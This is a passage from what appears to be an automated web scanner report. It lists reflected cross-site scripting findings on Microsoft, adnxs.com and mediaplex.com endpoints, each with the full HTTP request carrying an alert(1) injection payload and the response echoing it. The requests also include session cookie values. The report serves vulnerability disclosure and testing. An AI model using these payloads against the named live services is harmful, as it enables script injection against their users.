The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9eecd<img%20src%3da%20onerror%3dalert(1)>10c59ec9522 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9eecd<img src=a onerror=alert(1)>10c59ec9522 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&9eecd<img%20src%3da%20onerror%3dalert(1)>10c59ec9522=1 HTTP/1.1
Host: i3.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/cc512759.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; ADS=SN=175A21EF; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303201470809:ss=1303201412112; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=23d3eadb-2e57-4cdb-babc-afe9807533a5&Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/19/2011 11:23:50&Microsoft.NumberOfVisits=3&SessionCookie.Id=C488C2B80EEAE31CD61220326F9B97E9; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/19/2011 11:23:50&Microsoft.VisitStartDate=04/19/2011 11:23:33&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=3&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; MS0=1a2d640efaf1443f825bb8c35bff2532; msdn=L=1033; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
ntCoent-Length: 12915
Content-Type: application/x-javascript
ETag: 9b52ce8f17c99b63817c9bdbe6b8ad26
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Content-Length: 12915
Cache-Control: public, max-age=43199
Expires: Tue, 19 Apr 2011 23:31:15 GMT
Date: Tue, 19 Apr 2011 11:31:16 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&9eecd<img src=a onerror=alert(1)>10c59ec9522=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

3.243. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5cfd3<img%20src%3da%20onerror%3dalert(1)>070328299a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cfd3<img src=a onerror=alert(1)>070328299a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&5cfd3<img%20src%3da%20onerror%3dalert(1)>070328299a1=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303201439308:ss=1303201412112; ADS=SN=175A21EF; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
ntCoent-Length: 12915
Content-Type: application/x-javascript
ETag: eb3b7cfed02a572aca16eae15803333c
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB32
Content-Length: 12915
Cache-Control: public, max-age=43200
Expires: Tue, 19 Apr 2011 23:23:51 GMT
Date: Tue, 19 Apr 2011 11:23:51 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&5cfd3<img src=a onerror=alert(1)>070328299a1=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

3.244. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c463'-alert(1)-'ba5a810b394 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=zszMzMzM7D_NzMzMzMzsPwAAAMDMzOw_zczMzMzM7D_NzMzMzMzsP6-N1StXo8pzvNv2i6g_Cj5JfmVNAAAAADchAAC1AAAAagEAAAIAAAB0-AIA0WMAAAEAAABVU0QAVVNEACwB-gDNClQApQMBAgUCAAQAAAAAhS4AGgAAAAA.&tt_code=vert-63&udj=uf%28%27a%27%2C+10117%2C+1298497097%29%3Buf%28%27c%27%2C+49291%2C+1298497097%29%3Buf%28%27r%27%2C+194676%2C+1298497097%29%3Bppv%289239%2C+%278343660854450163119%27%2C+1298497097%2C+1299706697%2C+49291%2C+25553%29%3B&cnd=!Yxa9ZAiLgQMQ9PALGAAg0ccBKFQxAAAAwMzM7D9CEwgAEAAYACABKP7__________wFIAFAAWM0VYABo6gI.5c463'-alert(1)-'ba5a810b394&referrer=http://www.komonews.com/weather&pp=TWV-SQAH9ygK7F4kAKxMFELM_cWJgyGndva2MQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBVmNSX5lTajuH6S8sQeUmLEF1PX12QHs56PgHNzOmvFCABABGAEgADgBUIDH4cQEYMmGo4fUo4AQggEXY2EtcHViLTI3MzM5OTQzMTU5NjI2MzOyARB3d3cua29tb25ld3MuY29tugEKMzAweDI1MF9hc8gBCdoBH2h0dHA6Ly93d3cua29tb25ld3MuY29tL3dlYXRoZXKYArQBwAIEyALE5swWqAMB6AM_6AO4KugDvAToA7kp9QMAAABE9QMgAAAA%26num%3D1%26sig%3DAGiWqtys2Mfisw0UXTlYtNy6D11F57DF6w%26client%3Dca-pub-2733994315962633%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIr7gCEAoYASABKAEwtPyV6wQQtPyV6wQYAA..; sess=1; uuid2=4470455573253905340; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6WIpbjn!e5'S.ASR/7l([H.cpVGe8tPtQ-y5#we@ie65CB#S!9Y^vP[KF^P'%_EYX5)gWYmv-[1%xvmrNHt.[<D(7u)aj^!iH1rT^=*7C^Bjc%C9:V]:>i#xK^@g2k_woCAWF@?sM.MP<1ix2hdXO=Pl'/PbHH*j^3)C6XZhUC$K!+.kQ]f9jkt)1ur:'MK@Nx4=0i7Jr<lXda`#HI#!f

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 24-Feb-2011 21:42:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Tue, 24-May-2011 21:42:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Tue, 24-May-2011 21:42:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6WIpbjn!e5'S.ASR/7l([H.cpVGe8tPtQ-y5#we@ie65CB#S!9Y^vP[KF^P'%_EYX5)gWYmv-[1%xvmrNHt.[<D(7u)aj^!iH1rT^=*7C^Bjc%C9:V]:>i#xK^@g2k_woCAWF@?sM.MP<1ic[d7oDDJ$2YVA<8r(ccEO=Pl'/PbFsX??`gC6X[1UC$K!+.kQaf9jkt):tzmY(.j84K]4XtqIGp!x$aQ6a4:5; path=/; expires=Tue, 24-May-2011 21:42:44 GMT; domain=.adnxs.com; HttpOnly
Date: Wed, 23 Feb 2011 21:42:44 GMT
Content-Length: 1516

document.write('<a href="http://ib.adnxs.com/click/CtejcD0Kxz8K16NwPQrHPwAAAMDMzOw_zczMzMzM7D_NzMzMzMzsP6-N1StXo8pzvNv2i6g_Cj5JfmVNAAAAADchAAC1AAAAagEAAAIAAAB0-AIA0WMAAAEAAABVU0QAVVNEACwB-gDNClQApQMBAgUCAAQAAAAAHilpjAAAAAA./cnd=!Yxa9ZAiLgQMQ9PALGAAg0ccBKFQxAAAAwMzM7D9CEwgAEAAYACABKP7__________wFIAFAAWM0VYABo6gI.5c463'-alert(1)-'ba5a810b394/referrer=http%3A%2F%2Fwww.komonews.com%2Fweather/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBBVmNSX5lTajuH6S8sQeUmLEF1PX12QHs56PgHNzOmvFCABABGAEgADgBUIDH4cQEYMmGo4fUo4AQg
...[SNIP]...

3.245. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37b5e'%3balert(1)//d8dd3aa7398 was submitted in the redir parameter. This input was echoed as 37b5e';alert(1)//d8dd3aa7398 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.glam_style&size=160x600&referrer=http%3A%2F%2Fpoponthepop.com%2F2011%2F04%2Flindsay-lohan-loses-victoria-gotti-role%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.glam_style%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-7815267_1303349054%2C11f8f328940989e%2Cent%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D888832%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D1303349054%3F37b5e'%3balert(1)//d8dd3aa7398 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d5a43de1-76cb-482d-b60c-710bb61c0a49?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349054
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII3I4BEAoYCSAJKAkwsvqt7QQQsvqt7QQYCA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6W+Yo.b7e5'Qr*n#0-+APASPp[Bs3dk4*4W2@5sJdI5v%Y.@+!_/VvMXSE*bt=_O$3b_^wlH]t*WlBJ^1-5$V<I_9kqO#*eDcTw6zN8L)X*7P(eC)!'W$^W[Ye0fJA^f>PH-M5YB///''voY:[:'c*00u`4jlX%LRMdwxiNov]c_Z!6y@AQ$`QY; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Apr-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 20-Jul-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb872495=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb578898=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb793535=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 20-Jul-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIsnoQChgDIAMoAzDgkb7tBBDgkb7tBBgC; path=/; expires=Wed, 20-Jul-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb807732=5_[r^XI()v^qSm+!@@-#-2Yos?enc=fBSuR-F6xD8830-Nl27CPwAAAMDMzPw_PN9PjZduwj97FK5H4XrEP8IFOtoBNj05SsYda6b2ziXgiK9NAAAAAO85AwA3AQAApgEAAAIAAACKSgMAylsAAAEAAABVU0QAVVNEAKAAWAKqAQAAYw0BAgUCAAUAAAAAayTpMAAAAAA.&tt_code=cm.glam_style&udj=uf%28%27a%27%2C+6376%2C+1303349472%29%3Buf%28%27c%27%2C+51148%2C+1303349472%29%3Buf%28%27r%27%2C+215690%2C+1303349472%29%3B&cnd=!PRdGYAjMjwMQipUNGAAgyrcBKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFCCwi2VBAAGAAgAigBSABQAFiqA2AAaKYD; path=/; expires=Fri, 22-Apr-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 20-Jul-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6W+Yo.b7e5'Qr*n#0-+APASPp[Bs3dk4*4W2@5sJdI5v1GC]*tl9F+2rnTs2'wY3a$51gemJ/CoLs<*HUUHQvxi5SmZ/^cQAam9WQBG*g6o3dX6<lo=s9OS7yRn<vC(c@*$3837T1R`mJH<k+phc8pZhitq]xK]M_@k?eip%]%?]u'kjIO6(>S:; path=/; expires=Wed, 20-Jul-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Apr 2011 01:31:12 GMT
Content-Length: 428

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.glam_style/;net=cm;u=,cm-7815267_1303349054,11f8f328940989e,ent,ax.1;;cmw=owl;sz=160x600;net=cm;env=ifr;ord1=888832;contx=ent;an=1;dc=w;btg=;ord=1303349054?37b5e';alert(1)//d8dd3aa7398">
...[SNIP]...

3.246. http://img.mediaplex.com/content/0/15017/124821/VNX_Direct_1a_728x90_SIMPLE_v2_phone.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15017/124821/VNX_Direct_1a_728x90_SIMPLE_v2_phone.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d86c"-alert(1)-"09d3c1b00c was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15017/124821/VNX_Direct_1a_728x90_SIMPLE_v2_phone.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-124821-28408-1%3Fmpt%3D31620111024d86c"-alert(1)-"09d3c1b00c&mpt=3162011102&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 11:33:25 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 17:30:07 GMT
ETag: "3bcf0b-ea9-49e88c78585c0"
Accept-Ranges: bytes
Content-Length: 4083
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" src=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

(function(){
var protocol = window.location.protocol;
if (protocol == "https
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15017-124821-28408-1%3Fmpt%3D31620111024d86c"-alert(1)-"09d3c1b00c");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15017-124821-28408-1%3Fmpt%3D31620111024d86c"-alert(1)-"09d3c1b00c");
mpck =
...[SNIP]...

3.247. http://img.mediaplex.com/content/0/15017/124821/VNX_Direct_1a_728x90_SIMPLE_v2_phone.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15017/124821/VNX_Direct_1a_728x90_SIMPLE_v2_phone.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc46"%3balert(1)//b5d197bd84e was submitted in the mpvc parameter. This input was echoed as 5fc46";alert(1)//b5d197bd84e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15017/124821/VNX_Direct_1a_728x90_SIMPLE_v2_phone.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-124821-28408-1%3Fmpt%3D3162011102&mpt=3162011102&mpvc=5fc46"%3balert(1)//b5d197bd84e HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 11:33:29 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 17:30:07 GMT
ETag: "3bcf0b-ea9-49e88c78585c0"
Accept-Ranges: bytes
Content-Length: 4089
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" src=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

(function(){
var protocol = window.location.protocol;
if (protocol == "https
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("5fc46";alert(1)//b5d197bd84e");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("5fc46";alert(1)//b5d197bd84e");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("5fc46"%3balert(1)//b5d197bd84e");
...[SNIP]...

3.248. http://img.mediaplex.com/content/0/3484/119769/81842_EXF000FL__BIGBRAND_v02__728x90.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/119769/81842_EXF000FL__BIGBRAND_v02__728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2aed4"%3balert(1)//9d15426f494 was submitted in the mpck parameter. This input was echoed as 2aed4";alert(1)//9d15426f494 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3484/119769/81842_EXF000FL__BIGBRAND_v02__728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F3484-119769-15222-231%2F15%3Fmpt%3D1041069426%26siteid%3D0%26adid%3D462001%26fcid%3D462001%26so_ustat%3D4%26ir_DAP_I131%3D4%26ir_DAP_I132%3D1%26ir_DAP_I133%3D%26ir_DAP_I5%3D0%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D2260806429192aed4"%3balert(1)//9d15426f494&mpt=1041069426&siteid=0&adid=462001&fcid=462001&so_ustat=4&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=226080642919&mpvc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253DL%2526ai%253DBwUJx96GtTYznHYrJsQfyyZneAp2t35ECtcav8x3AjbcBwOGYAhABGAEgvs7lDTgAUM6Bz4IDYMnug4jwo-wSsgEGeHNzLmN4ugEJNzI4eDkwX2FzyAEJ2gFVaHR0cDovL3hzcy5jeC9leGFtcGxlcy9kb3JrL3hzcy9zdG9yZWQtcmVmbGVjdGVkLXhzcy1zcWwtaW5qZWN0aW9uLXJlcHV0YXRpb25jb20uaHRtbLgCGMgC6_TPDKgDAdEDHROmdxAz1pjoA6YD6AMF9QMAAADE%2526num%253D1%2526sig%253DAGiWqtzwxnWJMgCOmYGbqZNq2knEzeN17g%2526client%253Dca-pub-4063878933780912%2526adurl%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303242819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fdork%2Fxss%2Fstored-reflected-xss-sql-injection-reputationcom.html&dt=1303224864012&bpp=3&shv=r20110414&jsv=r20110412&correlator=1303224864124&frm=0&adk=1607234649&ga_vid=1414392798.1303224865&ga_sid=1303224865&ga_hid=1469206436&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1317&bih=1003&fu=0&ifi=1&dtd=508&xpc=H1SUBNINVm&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 14:54:40 GMT
Server: Apache
Last-Modified: Wed, 09 Feb 2011 17:18:36 GMT
ETag: "69ef39-c38-49bdca7baf300"
Accept-Ranges: bytes
Content-Length: 5810
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mpck_encode = "rover.ebay.com%2Frover%2F1%2F3484-119769-15222-231%2F15%3Fmpt%3D1041069426%26siteid%3D0%26adid%3D462001%26fcid%3D462001%26so_ustat%3D4%26ir_DAP_I131%
...[SNIP]...
over/1/3484-119769-15222-231/15?mpt=1041069426&siteid=0&adid=462001&fcid=462001&so_ustat=4&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=2260806429192aed4";alert(1)//9d15426f494\" TARGET=\"_blank\">
...[SNIP]...

3.249. http://img.mediaplex.com/content/0/3484/119769/81842_EXF000FL__BIGBRAND_v02__728x90.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/119769/81842_EXF000FL__BIGBRAND_v02__728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59608"%3balert(1)//758f25329e2 was submitted in the mpvc parameter. This input was echoed as 59608";alert(1)//758f25329e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3484/119769/81842_EXF000FL__BIGBRAND_v02__728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F3484-119769-15222-231%2F15%3Fmpt%3D1041069426%26siteid%3D0%26adid%3D462001%26fcid%3D462001%26so_ustat%3D4%26ir_DAP_I131%3D4%26ir_DAP_I132%3D1%26ir_DAP_I133%3D%26ir_DAP_I5%3D0%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D226080642919&mpt=1041069426&siteid=0&adid=462001&fcid=462001&so_ustat=4&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=226080642919&mpvc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253DL%2526ai%253DBwUJx96GtTYznHYrJsQfyyZneAp2t35ECtcav8x3AjbcBwOGYAhABGAEgvs7lDTgAUM6Bz4IDYMnug4jwo-wSsgEGeHNzLmN4ugEJNzI4eDkwX2FzyAEJ2gFVaHR0cDovL3hzcy5jeC9leGFtcGxlcy9kb3JrL3hzcy9zdG9yZWQtcmVmbGVjdGVkLXhzcy1zcWwtaW5qZWN0aW9uLXJlcHV0YXRpb25jb20uaHRtbLgCGMgC6_TPDKgDAdEDHROmdxAz1pjoA6YD6AMF9QMAAADE%2526num%253D1%2526sig%253DAGiWqtzwxnWJMgCOmYGbqZNq2knEzeN17g%2526client%253Dca-pub-4063878933780912%2526adu